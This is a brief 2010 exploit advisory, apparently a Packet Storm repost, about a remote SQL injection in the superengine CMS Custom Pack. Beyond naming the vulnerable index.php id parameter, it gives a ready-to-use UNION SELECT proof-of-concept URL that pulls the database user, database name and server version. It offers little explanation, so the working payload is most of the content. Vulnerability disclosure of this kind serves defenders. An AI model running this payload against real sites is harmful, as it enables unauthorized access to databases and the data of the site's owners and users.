Superengine CMS suffers from a remote SQL injection vulnerability.
50dac8d5ad1c183e0b869e3e0e7c47358d1a75cc5dc7c40ea95549d3617ebb4b
.__.__
_______ _|__| | ____________ ____ ____
_/ __ \ \/ / | | \___ / _ \ / \_/ __ \
\ ___/\ /| | |__/ ( <_> ) | \ ___/
\___ >\_/ |__|____/_____ \____/|___| /\___ >
\/ \/ \/ \/ .org
Author: 10n1z3d <10n1z3d[at]w[dot]cn>
Date: 15/02/2010
---------------------------------------------------------
superengine CMS (Custom Pack) SQL Injection Vulnerability
---------------------------------------------------------
Vendor: http://superengine.ro/
Vuln:
http://[server]/index.php?mod=0&id=1[SQLI]
PoC:
http://[server]/index.php?mod=0&id=-1337+UNION+ALL+SELECT+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--
---------------------------------------------------------
Greetz to all evilzone.org members.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed